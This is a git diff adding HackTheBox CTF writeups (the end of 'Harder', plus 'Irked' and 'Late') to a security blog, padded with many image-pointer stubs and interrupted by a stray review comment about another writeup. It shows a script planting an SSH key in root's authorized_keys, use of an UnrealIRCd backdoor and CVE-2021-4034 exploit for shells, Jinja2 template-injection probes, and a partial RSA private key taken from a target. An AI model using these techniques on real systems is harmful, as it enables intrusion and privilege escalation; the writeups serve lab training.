6F99621E4D64B6AFCE56E864C91D6615944F6874 +uid [ unknown] Administrator +sub cv25519 2020-07-07 [E] +``` +I then create a script that will create a `/root/.ssh` and import my rsa.pub key. This should allow me to connect as root via SSH. 
+ + +```bash +#!/bin/bash +mkdir /root/.ssh +echo "ssh-rsa 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 d3vyce@kali" > /root/.ssh/authorized_keys +``` +I then encrypt the script with the following command: + +![](img/image-14.webp) + +Then I execute it with the following command: + + +```bash +run-crypted.sh script.sh +``` +I can now connect via SSH to the root account and get the last flag. + +![](img/image-15.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave source code directly accessible on a website +- Do not leave files with credit cards in them +- Run web applications with a user with the minimum possible rights +- Do not let the root public key accessible by another user than root diff --git a/content/writeup-ctf/writeup-irked-htb/featured.png b/content/writeup-ctf/writeup-irked-htb/featured.png new file mode 100644 index 0000000..45f0a5d --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d08a14d524e6adcd8ead9498776f7c92a57cae6f82530fc5778d168a94568e04 +size 272240 diff --git a/content/writeup-ctf/writeup-irked-htb/featured.webp b/content/writeup-ctf/writeup-irked-htb/featured.webp new file mode 100644 index 0000000..77fbe28 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e964f5b0ce6655ba56191eaf946340391a8776ba77cadeccea509b1e6f0d8045 +size 24068 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-1.png b/content/writeup-ctf/writeup-irked-htb/img/image-1.png new file mode 100644 index 0000000..22308a6 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1dcef166fdb2bba4a378f274f8938c230ea1456db2e548050ce73495e5fc8a35 +size 30464 
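Review bot: In the Privilege escalation section of writeup-harder-thm/index.md, the text says the script is to be signed "with the root key", but the quoted wrapper only runs `gpg --decrypt --no-verbose "$1" | ash`, so the operation is encryption to root's public key and no signature is ever checked. Reword that sentence, and revise the last recommendation accordingly: a public key is meant to be distributable, and the fix is for the root-run wrapper to verify a signature before executing anything (or not to execute decrypted input at all). Other points in the same hunk: the code block that should show the interesting part of the second commit contains only "+", so the reader never sees the `hash_hmac` code that the following paragraph analyses; restore it, and add one sentence explaining why the URL passes `n[]=1` and why the key in the PHP session is `false`, since the linked Securify post is currently the only explanation. The final command is written as `run-crypted.sh script.sh`, while the wrapper's own usage text says `execute-crypted command.gpg`; check the script name and pass the encrypted file. "Do not leave files with credit cards in them" presumably means credentials, given that the finding is the password in `evs-backup.sh`. The recommendations also skip the `admin/admin` login and the trust placed in the client-supplied `X-Forwarded-For` header, both of which the writeup relies on. Wording: "`h`, `host` et `n`" still contains the French "et", and "Can I create the following link" should be "I can then create the following link".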
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-1.webp b/content/writeup-ctf/writeup-irked-htb/img/image-1.webp new file mode 100644 index 0000000..c3c3786 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:911d16c0a8a5168dbd5cc5c6ed3a2a818e7d225db3dc27cf3c72691992a6da8d +size 32382 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-10.png b/content/writeup-ctf/writeup-irked-htb/img/image-10.png new file mode 100644 index 0000000..2b5b1b1 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bbe5adcd12137459431ff68ff030d967e2f99d3fcab9a34bb527046a9451a634 +size 5084 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-10.webp b/content/writeup-ctf/writeup-irked-htb/img/image-10.webp new file mode 100644 index 0000000..df151ff --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8f341f3485ced0db32ee2f85064a8dd570412f4b0bd5670a15d26e6a9facb87 +size 3390 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-11.png b/content/writeup-ctf/writeup-irked-htb/img/image-11.png new file mode 100644 index 0000000..2f37958 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:28a7a929efc2145790e4d22e48e26cade4588e3e6e68e0e665dbaec2a2058e13 +size 49910 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-11.webp b/content/writeup-ctf/writeup-irked-htb/img/image-11.webp new file mode 100644 index 0000000..6728078 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17988624623d280656f10961ee7f4f0dac6f6cb777b0de8156cca00d108ec195 +size 46436 
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-2.png b/content/writeup-ctf/writeup-irked-htb/img/image-2.png new file mode 100644 index 0000000..6a20a70 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c815b66d881c923df102192e206b9f84392df867a8bb3f7ee002cdc692fc053d +size 265177 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-2.webp b/content/writeup-ctf/writeup-irked-htb/img/image-2.webp new file mode 100644 index 0000000..ad34af3 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3b405882f15a534b36c1da13bf8909cb57ec99bad3119b9ba10470b506d72998 +size 28780 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-3.png b/content/writeup-ctf/writeup-irked-htb/img/image-3.png new file mode 100644 index 0000000..b9bb470 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:986310b1235f0cee4dada10549b4f402e020ae2b02de9f9a7a05b0bb69301ed8 +size 14940 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-3.webp b/content/writeup-ctf/writeup-irked-htb/img/image-3.webp new file mode 100644 index 0000000..4a2fdb6 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:417f8e248aab6901fb41d14915eb8b9616b15ce67628c2e4ad72249f9d394ba1 +size 11358 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-4.png b/content/writeup-ctf/writeup-irked-htb/img/image-4.png new file mode 100644 index 0000000..27f464c --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:56a7d7c52f778e9130fec976a7e4681f9113ad84d4e8974979028302a5487f55 +size 57453 
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-4.webp b/content/writeup-ctf/writeup-irked-htb/img/image-4.webp new file mode 100644 index 0000000..702953e --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9baba3099fc41c1eb04dd624364e20b75dc62bba43722e076da058cec31702bc +size 47106 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-5.png b/content/writeup-ctf/writeup-irked-htb/img/image-5.png new file mode 100644 index 0000000..b3d0a80 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba56559e2f31aab2fd221297421d1e12ad92de2471e6bedbcc6033b5c25822a0 +size 8600 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-5.webp b/content/writeup-ctf/writeup-irked-htb/img/image-5.webp new file mode 100644 index 0000000..774e10b --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2f9ccb18887cf2d15243e30857983ef21f032c6854ea63c4a2818d9603320a34 +size 6498 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-6.png b/content/writeup-ctf/writeup-irked-htb/img/image-6.png new file mode 100644 index 0000000..2df1ea9 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14012d2bd6bbc37f4a8c2e4d67c215b681018f21dc3df2686086f2d97b564e0e +size 10930 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-6.webp b/content/writeup-ctf/writeup-irked-htb/img/image-6.webp new file mode 100644 index 0000000..b182676 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:258d6a332ffa18403bbc86cf4be49a52d297ff20e135ad1a927729770ca93024 +size 10934 
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-7.png b/content/writeup-ctf/writeup-irked-htb/img/image-7.png new file mode 100644 index 0000000..da1a1ee --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76058216c0d83a6d9df2b96888dcf4922207f0589c8c542d77ac4b5f546b3ed7 +size 16206 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-7.webp b/content/writeup-ctf/writeup-irked-htb/img/image-7.webp new file mode 100644 index 0000000..ef1e142 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67d63ce3519500bb0e9f7ed86b61a7a3a608a31dc2ea0bb309d6bac4c49f2928 +size 23170 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-8.png b/content/writeup-ctf/writeup-irked-htb/img/image-8.png new file mode 100644 index 0000000..602c080 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:df55203ce2b07b366aab458cb12ddfc5ea833d62f4144e69b45ebaf077aba5de +size 9970 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-8.webp b/content/writeup-ctf/writeup-irked-htb/img/image-8.webp new file mode 100644 index 0000000..b4dfc73 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70bc5e95e1a9db5683c619dd571da8a57b656522a1556b525a207af39acdf576 +size 7388 diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-9.png b/content/writeup-ctf/writeup-irked-htb/img/image-9.png new file mode 100644 index 0000000..66ea995 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ab88cd87c4ffd550754d697d8d93e81de87ce310f3edc60f3d6ca1af65f8823 +size 41862 
diff --git a/content/writeup-ctf/writeup-irked-htb/img/image-9.webp b/content/writeup-ctf/writeup-irked-htb/img/image-9.webp new file mode 100644 index 0000000..e27596d --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0622f28cf723787893b5747a4db631e9fe3fa3402401e7321829a42b3a6131c2 +size 57106 diff --git a/content/writeup-ctf/writeup-irked-htb/index.md b/content/writeup-ctf/writeup-irked-htb/index.md new file mode 100644 index 0000000..4731552 --- /dev/null +++ b/content/writeup-ctf/writeup-irked-htb/index.md 
@@ -0,0 +1,97 @@ +--- +title: "Writeup - Irked (HTB)" +date: 2022-05-24 +slug: "writeup-irked-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Irked](https://app.hackthebox.com/machines/Irked) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.11.146 +``` +Many TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 111/tcp : rpcbind +- 6697/tcp : IRC (UnrealIRCd) +- 8067/tcp : IRC (UnrealIRCd) +- 52411/tcp : Status +- 65534/tcp : IRC (UnrealIRCd) + +![](img/image-2.webp) + +## Exploit + +Following the nmap scan I notice that there is the port 65534 open with the UnrealIRC service. After some research on google I find that there is a big exploit for version 3.2.8.1. Before doing anything else I start by testing this exploit. I search the module in Metasploit : + +![](img/image-3.webp) + +Then after setting the options I launch the exploit: + +![](img/image-4.webp) + +Without success, but it's weird it's an error related to a setting and not a problem related to the target, so I try a second version that I find on github: [UnrealIRCd-3.2.8.1-Backdoor](https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor) + +After adding my IP/Port in the file, I launch the exploit with the following command: + +![](img/image-5.webp) + +After a few seconds I now have a reverse shell as ircd. + +![](img/image-6.webp) + +I don't have the permissions to read the first flag, but I find a hidden `.backup` file I can consult: + +![](img/image-7.webp) + +In this file a sentence and what could look like a password. In the sentence it is referred to steganography. + + +> Steganography  is the practice of concealing a message within another message or a physical object. 
In computing/electronic contexts, a computer file, message, image, or video is concealed within another file, message, image, or video. + +The only image we've come across so far is on the site of the beginning of the machine. I download it and use [steghide](https://0xrick.github.io/lists/stego/#steghide) with the password I found. + +![](img/image-8.webp) + +I manage to extract a `pass.txt` file! In this file I find the following password : + + +```bash +Kab6h+m+bbp2J:HG +``` +So I try to connect via SSH to the user `djmardov` : + +![](img/image-9.webp) + +I now have a shell with the user `djmardov` and I can get the first flag. + +## Privilege escalation + +I start by running a [linpeas.sh](https://linpeas.sh) scan. + +![](img/image-10.webp) + +Quickly I find that the machine is vulnerable to CVE-2021-4034. So I will use the following [CVE-2021-4034 Github](https://github.com/berdav/CVE-2021-4034) exploit. + +After downloading the different files, I compile the code with `make`, then I launch the program. + +![](img/image-11.webp) + +I now have a `root` shell and can retrieve the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Update UnrealIRC to fix the exploit +- Do not store clear passwords in a file +- Update Linux to fix CVE-2021-4034 diff --git a/content/writeup-ctf/writeup-late-htb/featured.png b/content/writeup-ctf/writeup-late-htb/featured.png new file mode 100644 index 0000000..8ebe7ce --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c8bfc06e2aed14b2d8d07b2cbece57b69301ece8e4dc03670a1ce144d6515fd +size 207942 diff --git a/content/writeup-ctf/writeup-late-htb/featured.webp b/content/writeup-ctf/writeup-late-htb/featured.webp new file mode 100644 index 0000000..a5ee470 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/featured.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3bf9d37da11370569f98ab8c5bf516d5e70e7012a812e69ad4eb88c25cda4766 +size 20012 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-1.png b/content/writeup-ctf/writeup-late-htb/img/image-1.png new file mode 100644 index 0000000..e26e11f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad525c4be0f05c98c2c1d9ae69d1d07bdb5561e439e95f82e854afa2bc324772 +size 35889 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-1.webp b/content/writeup-ctf/writeup-late-htb/img/image-1.webp new file mode 100644 index 0000000..699f2bb --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c3290f8978efc267ac4fd6d918e09879526af45190795715ee791c962d7a572c +size 34476 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-10.png b/content/writeup-ctf/writeup-late-htb/img/image-10.png new file mode 100644 index 0000000..fb8f496 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:39557633a105fae22b8b91eb20a2aec9c6ba6fd2b9dda993accc7a2d52af25af +size 27288 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-10.webp b/content/writeup-ctf/writeup-late-htb/img/image-10.webp new file mode 100644 index 0000000..323b257 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7db8e4cc4d133bbfea60335ed144395afb589fee089da1f6575580592975bb96 +size 27602 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-11.png b/content/writeup-ctf/writeup-late-htb/img/image-11.png new file mode 100644 index 0000000..42f6fbc --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-11.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b1f3e92cb1e9ac76c0abef48a1b0ba4405b69e6684849ff5bdd0507a056008f1 +size 3809 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-11.webp b/content/writeup-ctf/writeup-late-htb/img/image-11.webp new file mode 100644 index 0000000..56a897c --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ee6bb0cf5c45c812de9d7c83c3cb353570e10a8b8ffe32fdf34abc46e0065b28 +size 2980 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-12.png b/content/writeup-ctf/writeup-late-htb/img/image-12.png new file mode 100644 index 0000000..d94d245 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:936c8d193abd91970f7cfd9af1ba78a7073caebf1191aae799c86e957e76b5b2 +size 35866 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-12.webp b/content/writeup-ctf/writeup-late-htb/img/image-12.webp new file mode 100644 index 0000000..aa1146e --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a5e195aaad6c1531a714719469d0ce0f75159ccd92a50709cb88e8f9ca2907f +size 35318 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-13.png b/content/writeup-ctf/writeup-late-htb/img/image-13.png new file mode 100644 index 0000000..fa36aa0 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d67d7c17d1c8762178206e6f96ae53ccf74051e33838132151148609a04b78de +size 6707 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-13.webp b/content/writeup-ctf/writeup-late-htb/img/image-13.webp new file mode 100644 index 0000000..66986c7 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-13.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a30114603b0fd9e7749900f76e474f5c9d2ae121d329612bf648953d9e424fe +size 7848 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-2.png b/content/writeup-ctf/writeup-late-htb/img/image-2.png new file mode 100644 index 0000000..238f704 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13097dfcd6e3ee2a81ab0be2744ff77ce9ec9265118eca658f92ea5bbedad485 +size 762949 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-2.webp b/content/writeup-ctf/writeup-late-htb/img/image-2.webp new file mode 100644 index 0000000..b885178 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7627941e43f2c35ed4d3c0702f02255edf5c19e47efdbf8795577ffcfbb85a82 +size 98682 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-3.png b/content/writeup-ctf/writeup-late-htb/img/image-3.png new file mode 100644 index 0000000..e7bc91f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2513dedd6528fb26c8d11887464e1774c202c1a0a8c4614184b66baa6cac5104 +size 46214 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-3.webp b/content/writeup-ctf/writeup-late-htb/img/image-3.webp new file mode 100644 index 0000000..645734d --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:31984e9df97a16471132705223df00417e01ef75ee743005880562377e133337 +size 40932 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-4.png b/content/writeup-ctf/writeup-late-htb/img/image-4.png new file mode 100644 index 0000000..10be5b5 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-4.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f46c8c938bc88bb9b18a7dcf34a45a6e1bef7b351ba88fe7a8eda99ff772c5b4 +size 50750 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-4.webp b/content/writeup-ctf/writeup-late-htb/img/image-4.webp new file mode 100644 index 0000000..a187a38 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:751b5654a8f03ff6841849f97a3235a6eb4be2082300d17051da8e2e52c58df9 +size 50222 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-5.png b/content/writeup-ctf/writeup-late-htb/img/image-5.png new file mode 100644 index 0000000..8d3549b --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8e7b569d8005d9d1c6e4add2c1b510ffdc2fc706d9e5c71d4edbda53f4da6df +size 46065 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-5.webp b/content/writeup-ctf/writeup-late-htb/img/image-5.webp new file mode 100644 index 0000000..40e620f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c6ba8b8bb7543dfb797d9649c1d6e947c0e079b5d46734dcb890d5759e365f6c +size 36904 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-6.png b/content/writeup-ctf/writeup-late-htb/img/image-6.png new file mode 100644 index 0000000..fec4f1d --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8d34d8aec28cb840840879b9c808b04682950465165913872a72675810f73f7f +size 39767 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-6.webp b/content/writeup-ctf/writeup-late-htb/img/image-6.webp new file mode 100644 index 0000000..3b1d03f --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-6.webp 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30e909c8930dffb1388f6d849c5907087c034ea0dc3e089d6572a6998ba3d03d +size 23692 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-7.png b/content/writeup-ctf/writeup-late-htb/img/image-7.png new file mode 100644 index 0000000..b20910e --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e6f1f901834ca94b5749fab7eb123b1b413a2d8e1d1372b5e4f31bd94898ff0 +size 2421 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-7.webp b/content/writeup-ctf/writeup-late-htb/img/image-7.webp new file mode 100644 index 0000000..389d251 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d53e2a52449fd49e562a58f4674c8581c11bfd5c31b7e1ff4d9d32e83f0c44c +size 2180 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-8.png b/content/writeup-ctf/writeup-late-htb/img/image-8.png new file mode 100644 index 0000000..9a92137 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40b12ed439b1686b09b566184da8d7fff7bc069bdc3bc1a0b95087684eafa9a7 +size 9039 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-8.webp b/content/writeup-ctf/writeup-late-htb/img/image-8.webp new file mode 100644 index 0000000..9caf0f7 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:802bdbb02696148380ed6f5ac2f031eddd12576ad4b35a8feedc6ce25cd965f0 +size 12148 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-9.png b/content/writeup-ctf/writeup-late-htb/img/image-9.png new file mode 100644 index 0000000..9cc8961 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-9.png 
@@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02db7f024e1dff7517ed3aa21c989f01464a513c0b519a8c4ce7ca08dd86e232 +size 10881 diff --git a/content/writeup-ctf/writeup-late-htb/img/image-9.webp b/content/writeup-ctf/writeup-late-htb/img/image-9.webp new file mode 100644 index 0000000..222b991 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1867d5ddadf9b6cf23c42cebf54675dbdeb0b76791803db24e700cdf9852fc20 +size 15606 diff --git a/content/writeup-ctf/writeup-late-htb/index.md b/content/writeup-ctf/writeup-late-htb/index.md new file mode 100644 index 0000000..c0f6386 --- /dev/null +++ b/content/writeup-ctf/writeup-late-htb/index.md 
@@ -0,0 +1,146 @@ +--- +title: "Writeup - Late (HTB)" +date: 2022-04-25 +slug: "writeup-late-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Late](https://app.hackthebox.com/machines/Late) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.129.45.153 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 7.6p1) +- 80/tcp : HTTP web server (nginx 1.14.0) + +![](img/image-2.webp) + +## Exploit + +First of all, let's start with the enumeration of the site's files. + +![](img/image-3.webp) + +![](img/image-4.webp) + +After some research in the results nothing very interesting in this site. So I scan the subdomains. + +![](img/image-5.webp) + +I find the `images` subdomain. I add it in the `/etc/hosts` file, then I go to the site. + +![](img/image-6.webp) + +It is a site that allows to recover text present in an image and to send it back in a file. For that there is a treatment, in particular of the recognition of character. But is there any additional processing? + +After some unsuccessful tests I try to perform an XSS (Cross Site Scripting). To try to determine if there is indeed a possibility to do it. I send the following image to the server: + +![](img/image-7.webp) + +Depending on the answer I will be able to determine if this attack is feasible and also potentially this Framework is used: + +- 777777 -> Jinja2 +- 49 -> Twig + + +```bash +┌──(d3vyce㉿kali)-[~/Downloads] +└─$ cat results.txt +

7777777 +

+``` +After retrieving the result file we find the answer `7777777`. The XSS is therefore possible and the framework has a great chance to be Jinja2! I go to the following [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2) to see the possibilities. + +I first try to send the following image: + +![](img/image-8.webp) + + +```bash +┌──(d3vyce㉿kali)-[~/Downloads] +└─$ cat results.txt +

uid=1000(svc_acc) gid=1000(svc_acc) groups=1000(svc_acc) + +

+``` +In the result file I find the expected result, the web application is executed as `svc_acc`. I now try to see if this user has an RSA key that would allow me to connect via SSH: + +![](img/image-9.webp) + + +```bash +-----BEGIN RSA PRIVATE KEY----- +MIIEpAIBAAKCAQEAqe5XWFKVqleCyfzPo4HsfRR8uF/P/3Tn+fiAUHhnGvBBAyrM +HiP3S/DnqdIH2uqTXdPk4eGdXynzMnFRzbYb+cBa+R8T/nTa3PSuR9tkiqhXTaEO +bgjRSynr2NuDWPQhX8OmhAKdJhZfErZUcbxiuncrKnoClZLQ6ZZDaNTtTUwpUaMi +/mtaHzLID1KTl+dUFsLQYmdRUA639xkz1YvDF5ObIDoeHgOU7rZV4TqA6s6gI7W7 +d137M3Oi2WTWRBzcWTAMwfSJ2cEttvS/AnE/B2Eelj1shYUZuPyIoLhSMicGnhB7 +7IKpZeQ+MgksRcHJ5fJ2hvTu/T3yL9tggf9DsQIDAQABAoIBAHCBinbBhrGW6tLM +fLSmimptq/1uAgoB3qxTaLDeZnUhaAmuxiGWcl5nCxoWInlAIX1XkwwyEb01yvw0 +ppJp5a+/OPwDJXus5lKv9MtCaBidR9/vp9wWHmuDP9D91MKKL6Z1pMN175GN8jgz +W0lKDpuh1oRy708UOxjMEalQgCRSGkJYDpM4pJkk/c7aHYw6GQKhoN1en/7I50IZ +uFB4CzS1bgAglNb7Y1bCJ913F5oWs0dvN5ezQ28gy92pGfNIJrk3cxO33SD9CCwC 